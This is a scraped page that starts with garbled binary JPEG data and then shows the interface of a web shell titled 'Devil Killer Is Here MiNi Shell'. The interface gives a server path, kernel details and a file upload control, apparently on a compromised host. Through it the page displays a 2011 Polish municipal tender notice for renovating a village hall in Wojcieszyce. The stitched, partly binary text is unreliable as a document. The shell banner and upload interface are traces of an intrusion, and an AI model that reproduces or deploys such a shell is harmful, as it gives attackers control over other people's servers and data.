JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110221/60171-N-2011.html

<p class="kh_header"><b>Stara Kamienica: Remont i modernizacja wielofunkcyjnej świetlicy wiejskiej           w  Wojcieszycach</b><br>
<b>Numer ogłoszenia: 60171 - 2011; data zamieszczenia: 21.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stara Kamienica , Stara Kamienica 41, 58-512 Stara Kamienica, woj. dolnośląskie, tel. 75 75 14 337, faks 75 75 14 337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.new.bazagnim.pl/bip_stara_kamienica</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i modernizacja wielofunkcyjnej świetlicy wiejskiej           w  Wojcieszycach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem  zamówienia jest  remont i modernizacja wielofunkcyjnej świetlicy wiejskiej.
Projekt realizowany z dofinansowaniem  ze środków Unii Europejskiej w ramach Programu
Rozwoju  Obszarów Wiejskich  na lata 2007- 2013  -  Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich  _  Europa Inwestująca w Obszary Wiejskie _ .
                                       
2. Zakres rzeczowy obejmuje:

a)	prace remontowe i naprawcze:
-	remont dachu polegający na rozbiórce istniejącego pokrycia ceramicznego  i wykonanie nowego z dachówki ceramicznej karpiówki ułożonej w koronkę / ok. 395 m2 /, 
-	naprawa istniejącego pokrycia papowego dachu poprzez likwidację spękań, 
wybrzuszeń itp. i położenie papy wierzchniego krycia na całej powierzchni / ok. 171 m2 /,
-	naprawa elementów drewnianych konstrukcji,
-	wymienienie włazów dachowych i ław kominiarskich / ok. 5 mb /,
-	wykonanie nowej instalacji odgromowej  / ok. 70 mb /,
-	wymienienie istniejących rynien na nowe z blachy tytanowo - cynkowej  / ok. 61 mb /,
-	 wymienienie rur spustowych na nowe z PCV  / ok. 26 mb /, 
-	wykonanie nowych obróbek blacharskich z blachy cynkowo - tytanowej / ok. 18 m2 /,
-	założenie systemowych płotków śniegowych / ok. 12 mb /,
-	przemurowanie dwóch kominów z cegła klinkierową.

b)	remont elewacji budynku polegający na częściowym skuciu istniejących tynków / ok. 215 m2 /  i wykonaniu nowych, czyszczenie strumieniowo - ścierne powierzchni z kamienia i licowanej cegłą kamiennego cokołu / ok. 100 m2 /; wykonaniu nowej elewacyjnej powłoki malarskiej 



        farbą krzemianowo - silikatową / ok. 513 m2 /, wykonaniu cokołu z żywicznego tynku    
 mozaikowego / ok. 62 m2 /, wykonaniu zadaszenia nad wejściem do budynku / 2 daszki           o pow.  ok. 1,5 m2  każdy / oraz renowacji istniejącego o konstrukcji drewnianej / 1 szt. /.
c)	wykonanie drenażu opaskowego / ok. 86 mb /  z rur drenarskich, karbowanych PCV ze studzienkami tworzywowymi i izolacją pionową odkrytych ścian fundamentowych folia kubełkową;
d)	wykonanie podjazdu dla niepełnosprawnych połączonego z wykonaniem nowych schodków zewnętrznych (kostka betonowa typu POLBRUK - ok. 17 m2 ) , 
balustrada - stal nierdzewna / ok. 30 mb /;  
e)	wykonanie przyłącza kanalizacji deszczowej z rur kanalizacyjnych PCV / ok. 55 mb /;
f)	wykonanie nowej kotłowni z kotłem wodnym o mocy 100 kW, z dodatkowym rusztem i regulatorem pogodowym, opalanym groszkiem energetycznym, posiadający rozdzielacze obiegów grzewczych: kocioł grzewczy, obieg instalacji c.o., obieg ładowania wymiennika c.w.uż.,  obieg instalacji wentylacyjnej;
g)	wymiana instalacji wody zimnej i ciepłej wody użytkowej - łącznie ok. 90 mb rurociągu PE i
 ok. 12 mb rurociągu PCV z podejściami do przyborów z rur stalowych, 
montaż nowych przyborów: brodzik natryskowy (kpl.1), umywalki (kpl. 6), 
zlewozmywak (kpl. 1), pisuary (kpl. 1), ustępy typu kompakt (kpl. 4);
h)	wymiana instalacji kanalizacyjnej - łącznie ok. 65 mb rurociągu PWC;
i)	wymiana instalacji c.o. - łącznie ok. 400 mb rurociągów z rur stalowych instalacyjnych, wymiana łącznie ok. 28 kpl grzejników typu CN z głowicami termostatycznymi;
j)	wymiana instalacji elektrycznej, instalacji oświetleniowej, instalacji gniazd wtykowych, instalacji dzwonków - łącznie ok. 2640 mb przewodów kabelkowych i ok 90 mb przewodów wyrównawczych, montaż opraw świetlówkowych łącznie ok. 55 kpl.; 
k)	wewnętrzne roboty budowlane, do których po robotach demontażowych i rozbiórkowych należą miedzy innymi:
-	wykonanie ścianek działowych z płyt gipsowo - kartonowych i warstwą izolacyjną między nimi / ok. 211 m2 /
-	dostawa i montaż stolarki okiennej z PCV / ok. 30,32 m2 / i ceramicznymi podokiennikami (parapety zewnętrzne);
-	dostawa i montaż stolarki drzwiowej  ok. 26 m2 i ok. 3,6 m2 drzwi stalowych, pełnych;
-	remont drewnianych schodów wewnętrznych (wymiana części elementów);
-	wykonanie pod posadzkowej izolacji poziomej z płyt styropianowych gr. 5 cm / ok. 132 m2 / i warstw wyrównawczych pod posadzki;  
-	wykonanie posadzek z płyt gresowych, antypoślizgowych cementowych utwardzonych opiłkami z desek na pojedynczym legarowaniu / 65 m2 / i podłogi sportowej na podwójnym legarowaniu z drewnianych paneli / 202 m2 /;
-	ułożenie płytek ceramicznych ściennych / 91 m2 /;
-	roboty tynkarskie, w tym: przecierka / ok. 1230 m2 /, skucie starych /ok. 91 m2 /, wykonanie nowych / ok. 275 m2 /;
-	 roboty malarskie na ścianach / 805 m2 / i na sufitach / 500 m2 / farbami emulsyjnymi;


l)	wykonanie wentylacji mechanicznej w budynku, w tym : 
-	wyrzutnia dachowa, wentylatory ( 5 szt.);
-	czerpnia dachowa (2 szt.);
-	przewód wentylacyjny, kołowy (ok. 21 m2)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienie uzupełniające .

Zamówienie uzupełniające może być udzielone wybranemu , w drodze niniejszego postępowania, 
wykonawcy, kiedy zaistnieje konieczność powtórzenia tego samego rodzaju zamówienia zgodnego z przedmiotem zamówienia podstawowego , o wartości nie większej niż  50% wartości zamówienia podstawowego i w okresie do 3 lat od udzielenia tego zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.26.90-4, 45.11.12.00-0, 45.26.21.00-2, 45.26.10.00-4, 45.31.23.10-3, 45.44.30.00-4, 45.45.21.00-1, 45.42.10.00-4, 45.23.32.00-1, 45.26.35.00-6, 45.42.11.52-4, 45.32.00.00-6, 45.41.00.00-4, 45.44.21.00-8, 45.43.21.14-6, 45.43.10.00-7, 45.35.00.00-5, 45.23.21.41-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości 
                                     
10 000     PLN    (słownie: dziesięć tysięcy złotych)


2. Wadium może być wniesione w następujących formach:

a)	pieniądzu,

b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej      z  tym ,  że poręczenie kasy jest zawsze zobowiązaniem pieniężnym,

c)	gwarancjach bankowych,

d)	gwarancjach ubezpieczeniowych,

e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109,          poz. 1158, z późniejszymi zmianami).

3.  W przypadku składania przez wykonawcę wadium w formie gwarancji - gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:

a)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji ( Zamawiającego tj. Gmina Stara Kamienica),  gwaranta ( banku lub instytucji ubezpieczeniowej udzielających gwarancji ) oraz wskazanie ich siedzib,




b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,

c)	kwotę gwarancji,

d)	termin ważności gwarancji,

e)  zobowiązanie gwaranta do bezwarunkowego zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie :

- że  wykonawca ,  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy P.z.p.  nie złożył dokumentów lub oświadczeń, o których mowa w art.25.ust.1 ustawy P.z.p.,            lub  pełnomocnictw , a nie udowodnił , że nie wynikało to z przyczyn leżących po jego stronie

lub

-  że wykonawca ,  którego ofertę wybrano:
-odmówił podpisania umowy na warunkach określonych w ofercie,     lub
-nie wniósł zabezpieczenia należytego wykonania umowy,                  lub
-zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

Postanowienia pkt  3. stosuje się również do poręczeń, określonych w pkt 2.b) i  2.e).
4. Wadium wnoszone w pieniądzu należy wpłacić - wyłącznie przelewem - na rachunek Zamawiającego,  otwarty w  PLN  :   

Bank Gospodarki Żywnościowej  S.A. Oddział Operacyjny Jelenia Góra
numer 11 2030 0045 1110 0000 0100 0850 

z adnotacją w tytule wpłaty : Wadium  - remont świetlicy_Wojcieszyce
      
5.	Wadium wnoszone w innej, niż  _pieniądz_ dopuszczonej przez Zamawiającego formie / formach wykonawca wnosi do Zamawiającego  przy czym ,  w takim przypadku za termin doręczenia uważa się datę jego zdeponowania u  Kierownika Referatu Rozwoju Gminy -  budynek  Urzędu Gminy Stara Kamienica - I piętro  lub innej, wskazanej osoby .

6.	Wadium w innej, niż _pieniądz_ dopuszczonej  przez Zamawiającego, formie /formach wykonawca może  dołączyć do oferty - pod warunkiem ,  że umieszczone zostanie w osobnej  kopercie  opisanej (nazwa wykonawcy, adnotacja: Wadium-remont świetlicy_Wojcieszyce), w sposób umożliwiający zdeponowanie wadium u  Kierownika Referatu Rozwoju Gminy -  budynek  Urzędu Gminy Stara Kamienica - I piętro  lub innej, wskazanej osoby , przed upływem terminu do otwarcia  ofert - bez konieczności naruszenia  koperty , w której znajduje się oferta. 

7.  Wadium należy wnieść przed upływem terminu do składania ofert, przy czym wniesienie wadium    w _pieniądzu_ za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu do składania ofert. 

Dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest nie wystarczającym warunkiem do stwierdzenia, przez Zamawiającego, terminowego wniesienia wadium przez wykonawcę.

8.	Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 u.p.z.p.

9.	Zamawiający  zatrzymuje  wadium  wraz  z odsetkami,  jeżeli  wykonawca w  odpowiedzi  na wezwanie , o którym  mowa w punkcie 28.  nie złożył wymaganych przez Zamawiającego dokumentów lub oświadczeń o których mowa w art.25 ust.1 u.p.z.p., lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.  

10.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych         w ofercie  
b)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy
c)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

UWAGA:
Wadium wniesione w formie gwarancji i poręczeń musi obejmować wszystkie przypadki, w których Wykonawca traci wadium na rzecz Zamawiającego. W przypadku, gdy dokumenty te nie będą zabezpieczały w pełnym zakresie możliwych roszczeń Zamawiającego - Wykonawca zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-poparta należytym wykonaniem w okresie ostatnich 5 lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, prac budowlanych:
a)  polegających na budowie,  przebudowie lub remoncie co najmniej trzech (3) obiektów  użyteczności publicznej z zakresem zbliżonym do przedmiotu zamówienia.

Jeżeli w zrealizowanych trzech zamówieniach wykonawca nie może wykazać się zakresem zbliżonym do przedmiotu zamówienia, może uzupełnić go dodatkowo z maksymalnie trzech innych, zrealizowanych zamówień. 

Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót budowlanych                        z opisem ich zakresu w sporządzony według wzoru stanowiącego Załącznik Nr 4 do IDW,     
z podaniem  rodzaju robót  i wartości, dat i miejsca wykonania oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej              i prawidłowo ukończone.
W przypadku wykazania wartości wykonanych robót  w walutach innych niż PLN -  należy podać kwotę w PLN , przeliczając kwotę wartości wykonanych robót rozliczanych w innych walutach na  PLN wg kursu danej waluty, ogłaszanego przez Narodowy Bank Polski na dzień 15.02.2011 r.

Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW,   przy czymjeżeli dotyczy to wiedzy i doświadczenia - Inny podmiot udostępniający wiedzę                            i doświadczenie  tj. elementów niezbywalnych wykonawcy, musi wystąpić przy realizacji przedmiotu zamówienia w charakterze podwykonawcy. 

 W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna wiedza i doświadczenie- w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.) - Załącznik Nr 2 do IDW

    
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-dysponowanie odpowiednim potencjałem technicznym oraz osobami  zdolnymi do wykonania zamówienia, tj.  wskazać do uczestnictwa w wykonaniu niniejszego zamówienia 


Kierownika Budowy   posiadającego :

o	co najmniej pięć (5) lat doświadczenia zawodowego na stanowisku kierownika budowy, 
o	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej,
lub 
o	odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
o	ważny na dzień upływu terminu  składania ofert dokument potwierdzający przynależność  do właściwej  Izby Inżynierów Budownictwa.


b)	Kierownika robót  lub majstra robót posiadającego: 

o	co najmniej trzy (3) lata doświadczenia zawodowego na stanowisku kierownika budowy lub majstra robót , 
o	uprawnienia  budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej              w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych, gazowych, wodociągowych             i kanalizacyjnych  bez ograniczeń, 
lub 
odpowiadające im ważne  uprawnienia budowlane,  które zostały wydane na podstawie wcześniej wydanych przepisów w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych,  wodociągowych i kanalizacyjnych 

c)	Kierownika robót lub majstra robót,  posiadającego :

°  co najmniej dwa (2)  lata doświadczenia zawodowego na stanowisku kierownika budowy lub   
    majstra robót , 

°  uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności instalacyjnej                     
    w  zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
 lub 
    odpowiadające im ważne  uprawnienia budowlane,  które zostały wydane na podstawie wcześniej wydanych przepisów .
  
Przez wymagany  minimalny okres  doświadczenia zawodowego   należy rozumieć łączną ilość   miesięcy przepracowanych  na stanowisku jak proponowane, przy realizacji robót o podobnym charakterze jak przedmiot zamówienia.
Do minimalnego okresu doświadczenia zawodowego na stanowisku kierownika budowy i/lub majstra budowy  nie sumuje się okresu zatrudnienia danej osoby na innych budowach w tym samym czasie . 

Przez wymagany okres doświadczenia zawodowego  należy rozumieć  okres od daty uzyskania uprawnień budowlanych do daty ukazania się ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych .

Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej             i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego (art. 12 pkt 7 w zw. z art. 12 a Prawa budowlanego), wymagane będzie od tej osoby uznanie jej kwalifikacji zawodowych oraz wstąpienie do właściwej polskiej izby samorządu zawodowego. Postępowanie w sprawie uznania kwalifikacji zawodowych odbywa się na podstawie ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).
Dysponowanie osobą wymienioną powyżej , należy traktować jako minimalne wymagania Zamawiającego, nie wyczerpujące całości personelu niezbędnego do rzetelnego wypełnienia zobowiązań wykonawcy.

Na potwierdzenie spełniania powyższych warunków Wykonawcy są zobowiązani przedstawić:


1)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności osobę odpowiedzialną za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nie czynności wraz z  informacją o podstawie dysponowania tymi osobami - Załącznik Nr 5 do  IDW .

Z załączonego wykazu ma jednoznacznie wynikać, że ilość wykazanych osób, niezależnie od sposobu dysponowania nimi, jest w stanie przy założeniu 12 godzinnego dnia pracy wykonać zakres rzeczowy zamówienia z wyłączeniem robót wykonawczych przez Konsorcjanta i/lub podwykonawcę.

2)	Oświadczenie, że osoba(y) , które będą uczestniczyć w wykonywaniu zamówienia,               ( dotyczy osób odpowiedzialnych za kierowanie robotami budowlanymi, o których mowa w pkt. 1.3)  posiadają wymagane uprawnienia wydane zgodnie z przepisami ustawy z 07.07.1994 r. Prawa budowlanego  - Załącznik Nr 6 do IDW
Wykonawca może polegać na osobach zdolnych do wykonania niniejszego zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW.  W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich  łączny potencjał kadrowy - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.) - Załącznik Nr 2 do IDW

    
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-poparta posiadaniem 

a)  środków finansowych  lub zdolności kredytowej lub środków finansowych i zdolności kredytowej 
- w wysokości co najmniej 250 000  PLN,

Wykonawcy zobowiązani są przedłożyć informację z banku  lub spółdzielczej kasy oszczędnościowo -kredytowej, w których Wykonawca posiada rachunek, potwierdzającej  
wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.

b) opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia w wysokości  stanowiącej co najmniej  równowartość ceny ofertowej za wykonanie przedmiotu zamówienia. 


Do przedłożenia polisy lub innego dokumentu potwierdzającego, że wykonawca jest
ubezpieczony od odpowiedzialności cywilnej  zostanie wezwany wykonawca , którego oferta uznana zostanie za najkorzystniejszą   -  przed podpisaniem umowy.

Wykonawca może polegać na  zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW,   przy czym
-  jeżeli  dotyczy to środków finansowych,  od  podmiotu udostepniajacego wymagane jest przedłożenie informacji takiej jak wymagana od wykonawcy. 
W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.
Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.) - Załącznik Nr 2 do IDW

    
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
